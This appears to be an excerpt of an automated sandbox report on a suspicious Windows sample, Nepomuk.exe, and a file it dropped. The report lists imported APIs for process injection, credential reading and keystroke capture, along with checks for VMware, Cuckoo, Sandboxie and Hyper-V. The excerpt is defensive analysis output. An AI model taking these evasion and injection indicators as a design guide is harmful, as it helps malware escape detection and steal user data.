                    Source: Nepomuk.exe, NrEXDJiACHo.exe.7.dr, T68WJ1SM1U30WFLN7XXTLWOX8.exe.0.drBinary or memory string: MPVMP32ENTRYNTQUERYINFORMATIONPROCESSCOINITIALIZESECURITYWRITEPROCESSMEMORYFREELIBRARYLSAOPENPOLICYAUDITQUERYSYSTEMPOLICYFLASHWINDOWEXADJUSTWINDOWRECTEXGLOBALMEMORYSTATUSEXCOINITIALIZEEXVIRTUALALLOCEXDESTROYWINDOWSHOWWINDOWANIMATEWINDOWUPDATEWINDOWWSARECVCRYPTENCRYPTCRYPTDECRYPTUIARAISEAUTOMATIONEVENTCONTINUEDEBUGEVENTISDEBUGGERPRESENTCHECKREMOTEDEBUGGERPRESENTCOIMPERSONATECLIENTCOSETPROXYBLANKETWAITFORSINGLEOBJECTASSIGNPROCESSTOJOBOBJECTGETWINDOWRECTGETSYSTEMPOWERSTATUSQUERYSERVICESTATUSSETSERVICESTATUSSETFOCUSGETPROCADDRESSEXITPROCESSOPENPROCESSDEBUGACTIVEPROCESSSETWINDOWPOSGETCURSORPOSADJUSTTOKENPRIVILEGESGETSYSTEMMETRICSGETLASTERRORQUERYPERFORMANCECOUNTERSETUNHANDLEDEXCEPTIONFILTERDRAWMENUBARWSASTARTUPWSACLEANUPBEEPGETNATIVESYSTEMINFORAISEEXCEPTIONWOW64DISABLEWOW64FSREDIRECTIONINITIALIZECRITICALSECTIONOPENPROCESSTOKENWSAIOCTLDEVICEIOCONTROLNTDLL.DLLSBIEDLL.DLLSETSECURITYDESCRIPTORDACLWINDOWSCREATESTRINGUIACLIENTSARELISTENINGROINITIALIZEVMTOOLSD.EXEGETKEYSTATEGETASYNCKEYSTATESETTHREADEXECUTIONSTATESETSUSPENDSTATESETCAPTUREGETSYSTEMTIMEGETHOSTBYNAMEWRITEFILEREADFILETRANSLATEMESSAGEVIRTUALFREELOCALFREEGETERRORMODEROACTIVATEINSTANCECOCREATEINSTANCECONTROLSERVICEEMPTYCLIPBOARDOPENCLIPBOARDUIAHOSTPROVIDERFROMHWNDBINDCREATEREMOTETHREADCREATETHREADGETCURRENTPROCESSIDHEAPALLOCCOTASKMEMALLOCVIRTUALALLOCGLOBALALLOCISPROCESSINJOBCRYPTPROTECTDATASETCLIPBOARDDATALSTRCPYWREGDELETEKEYWMESSAGEBOXWCREATEMUTEXWLOADLIBRARYEXWREGOPENKEYEXWCREATEWINDOWEXWFINDWINDOWEXWGETVERSIONEXWREGQUERYVALUEEXWREGSETVALUEEXWCRYPTACQUIRECONTEXTWDRAWTEXTWCREATEEVENTWCREATEJOBOBJECTWLSTRCATWCREATEPROCESSWLOADCURSORWLOGONUSERWREGISTERSERVICECTRLHANDLERWSTARTSERVICECTRLDISPATCHERWOPENSCMANAGERWDIALOGBOXPARAMWSHGETFOLDERPATHWOUTPUTDEBUGSTRINGWCREATEFILEMAPPINGWWSPRINTFWLOOKUPPRIVILEGEVALUEWSHELLEXECUTEWGETCOMPUTERNAMEWFINDFIRSTFILEWENCRYPTFILEWDECRYPTFILEWDELETEFILEWCREATEFILEWPOSTMESSAGEWGETMESSAGEWFORMATMESSAGEWPEEKMESSAGEWDISPATCHMESSAGEWSENDMESSAGEWSTARTSERVICEWQUERYDOSDEVICEWCREDREADWSYSTEMFUNCTION036GETTICKCOUNT64
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeBinary or memory string: SBIEDLL.DLL
                    Source: Nepomuk.exe, NrEXDJiACHo.exe.7.dr, T68WJ1SM1U30WFLN7XXTLWOX8.exe.0.drBinary or memory string: XENSERVICE.EXE
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNativeSystemInfo,Gl0_2_00EF2610
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2594Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1108Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2948
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 527
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2490
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1121
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF23800_2_00EF2380
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_009522C010_2_009522C0
                    Source: C:\Users\user\Desktop\Nepomuk.exe TID: 7232Thread sleep time: -180000s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7604Thread sleep count: 2594 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2724Thread sleep count: 1108 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4476Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3216Thread sleep count: 2948 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1712Thread sleep count: 527 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1728Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7496Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep count: 2490 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep count: 1121 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 832Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5664Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\Nepomuk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWindowExW,ChildWindowFromPoint,GetWindowTextW,SetWindowTextW,GetWindowRect,GetClientRect,ClientToScreen,ScreenToClient,WindowFromPoint,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplayMonitors,SetWindowsHookExW,UnhookWindowsHookEx,CallNextHookEx,LoadCursorW,LoadIconW,LoadImageW,LoadStringW,LoadAcceleratorsW,LoadMenuW,MessageBoxW,MessageBoxExW,MessageBoxIndirectW,FlashWindow,FlashWindowEx,DefWindowProcW,CallWindowProcW,RegisterClassExW,UnregisterClassW,GetDpiForWindow,AdjustWindowRectExForDpi,GetTouchInputInfo,CloseTouchInputHandle,GetGestureInfo,CloseGestureInfoHandle,AnimateWindow,IsGUIThread,GetGuiResources,SwitchToThisWindow,TileWindows,CascadeWindows,WinHelpW,wsprintfW,wvsprintfW,GetModuleHandleW,GetCommandLineW,GetCurrentProcessId,GetCurrentThreadId,ExitProcess,TerminateProcess,GetVersion,GetProcessHeap,HeapValidate,GetSystemTime,GetLastError,SetLastError,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetProcessTimes,Sleep,SleepEx,GetTempPathW,CreateFileW,ReadFile,WriteFile,CloseHandle,DeleteFileW,CopyFileW,MoveFileW,GetFileSize,SetFilePointer,FlushFileBuffers,LockFile,UnlockFile,GetFileAttributesW,SetFileAttributesW,FindFirstFileW,FindNextFileW,FindClose,CreateDirectoryW,RemoveDirectoryW,GetDiskFreeSpaceW,GetDriveTypeW,CreateEventW,WaitForSingleObject,ReleaseMutex,CreateMutexW,CreateSemaphoreW,OpenEventW,WaitForMultipleObjects,SignalObjectAndWait,InitializeCriticalSection,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,TryEnterCriticalSection,GetSystemDirectoryW,GetEnvironmentVariableW,GetStartupInfoW,GetComputerNameW,GetUserNameW,GetSystemInfo,GetNative0_2_00EF2610
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2380 GetSystemInfo,GlobalMemoryStatusEx,GetTickCount,GetTickCount,Sleep,GetTickCount,CreateToolhelp32Snapshot,Process32First,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,lstrcmpiW,Process32Next,CloseHandle,0_2_00EF2380
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exeBinary or memory string: vmtoolsd.exe
                    Source: Nepomuk.exe, 00000000.00000003.1339975888.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471118429.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1391450964.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472216522.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350308080.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1289528214.000000000169F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWt
                    Source: Nepomuk.exe, 00000000.00000003.1339975888.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1471118429.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1466589569.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1391450964.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472216522.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1350308080.000000000169F000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000003.1289528214.000000000169F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Nepomuk.exe, 00000000.00000003.1471118429.000000000164A000.00000004.00000020.00020000.00000000.sdmp, Nepomuk.exe, 00000000.00000002.1472124521.000000000164A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                    Source: Nepomuk.exe, 00000000.00000002.1471763541.0000000000F4F000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: vmtoolsd.execuckoo_svc.exe
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exe.0.drBinary or memory string: MpVmp32EntryNtQueryInformationProcessCoInitializeSecurityWriteProcessMemoryFreeLibraryLsaOpenPolicyAuditQuerySystemPolicyFlashWindowExAdjustWindowRectExGlobalMemoryStatusExCoInitializeExVirtualAllocExDestroyWindowShowWindowAnimateWindowUpdateWindowWSARecvCryptEncryptCryptDecryptUiaRaiseAutomationEventContinueDebugEventIsDebuggerPresentCheckRemoteDebuggerPresentCoImpersonateClientCoSetProxyBlanketWaitForSingleObjectAssignProcessToJobObjectGetWindowRectGetSystemPowerStatusQueryServiceStatusSetServiceStatusSetFocusGetProcAddressExitProcessOpenProcessDebugActiveProcessSetWindowPosGetCursorPosAdjustTokenPrivilegesGetSystemMetricsGetLastErrorQueryPerformanceCounterSetUnhandledExceptionFilterDrawMenuBarWSAStartupWSACleanupBeepGetNativeSystemInfoRaiseExceptionWow64DisableWow64FsRedirectionInitializeCriticalSectionOpenProcessTokenWSAIoctlDeviceIoControlntdll.dllSbieDll.dllSetSecurityDescriptorDaclWindowsCreateStringUiaClientsAreListeningRoInitializevmtoolsd.exeGetKeyStateGetAsyncKeyStateSetThreadExecutionStateSetSuspendStateSetCaptureGetSystemTimegethostbynameWriteFileReadFileTranslateMessageVirtualFreeLocalFreeGetErrorModeRoActivateInstanceCoCreateInstanceControlServiceEmptyClipboardOpenClipboardUiaHostProviderFromHwndbindCreateRemoteThreadCreateThreadGetCurrentProcessIdHeapAllocCoTaskMemAllocVirtualAllocGlobalAllocIsProcessInJobCryptProtectDataSetClipboardDatalstrcpyWRegDeleteKeyWMessageBoxWCreateMutexWLoadLibraryExWRegOpenKeyExWCreateWindowExWFindWindowExWGetVersionExWRegQueryValueExWRegSetValueExWCryptAcquireContextWDrawTextWCreateEventWCreateJobObjectWlstrcatWCreateProcessWLoadCursorWLogonUserWRegisterServiceCtrlHandlerWStartServiceCtrlDispatcherWOpenSCManagerWDialogBoxParamWSHGetFolderPathWOutputDebugStringWCreateFileMappingWwsprintfWLookupPrivilegeValueWShellExecuteWGetComputerNameWFindFirstFileWEncryptFileWDecryptFileWDeleteFileWCreateFileWPostMessageWGetMessageWFormatMessageWPeekMessageWDispatchMessageWSendMessageWStartServiceWQueryDosDeviceWCredReadWSystemFunction036GetTickCount64
                    Source: T68WJ1SM1U30WFLN7XXTLWOX8.exe, 00000007.00000002.2469642965.0000000001A3E000.00000004.00000020.00020000.00000000.sdmp, T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000A.00000002.2469443459.00000000018D8000.00000004.00000020.00020000.00000000.sdmp, T68WJ1SM1U30WFLN7XXTLWOX8.exe, 0000000D.00000002.2469818940.00000000016F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Nepomuk.exeAPI call chain: ExitProcess graph end nodegraph_0-38069
                    Source: C:\Users\user\Desktop\Nepomuk.exeAPI call chain: ExitProcess graph end nodegraph_0-38096
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeAPI call chain: ExitProcess graph end node
                    Source: C:\Users\user\Desktop\Nepomuk.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_03597FD0 LdrInitializeThunk,0_2_03597FD0
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF2610 CreateWindowExW,DestroyWindow,ShowWindow,ShowWindowAsync,UpdateWindow,CloseWindow,OpenIcon,BringWindowToTop,IsWindow,IsWindowVisible,IsIconic,IsZoomed,SetActiveWindow,GetActiveWindow,GetMessageW,TranslateMessage,DispatchMessageW,PostQuitMessage,PeekMessageW,WaitMessage,ReplyMessage,SendNotifyMessageW,SendMessageTimeoutW,RegisterWindowMessageW,DialogBoxParamW,CreateDialogParamW,EndDialog,GetDlgItem,SetDlgItemTextW,GetDlgItemTextW,CheckDlgButton,IsDlgButtonChecked,GetKeyState,GetAsyncKeyState,GetKeyboardState,SetKeyboardState,MapVirtualKeyW,VkKeyScanW,keybd_event,mouse_event,SetCapture,ReleaseCapture,GetCapture,SetFocus,GetFocus,SetForegroundWindow,GetForegroundWindow,BeginPaint,EndPaint,GetDC,ReleaseDC,GetWindowDC,FillRect,DrawTextW,RedrawWindow,InvalidateRect,ValidateRect,SetWindowLongW,GetWindowLongW,SetWindowPos,GetWindowPlacement,SetWindowPlacement,AdjustWindowRectEx,GetClassLongW,SetClassLongW,GetSystemMetrics,SystemParametersInfoW,ExitWindowsEx,LockWorkStation,CreateMenu,CreatePopupMenu,DestroyMenu,AppendMenuW,InsertMenuW,RemoveMenu,SetMenu,GetMenu,DrawMenuBar,TrackPopupMenu,GetSubMenu,SetCursor,GetCursor,ShowCursor,SetCaretPos,GetCaretPos,CreateCaret,DestroyCaret,SetTimer,KillTimer,GetTickCount,OpenClipboard,CloseClipboard,EmptyClipboard,SetClipboardData,GetClipboardData,IsClipboardFormatAvailable,GetParent,SetParent,GetWindow,FindWindowW,FindWind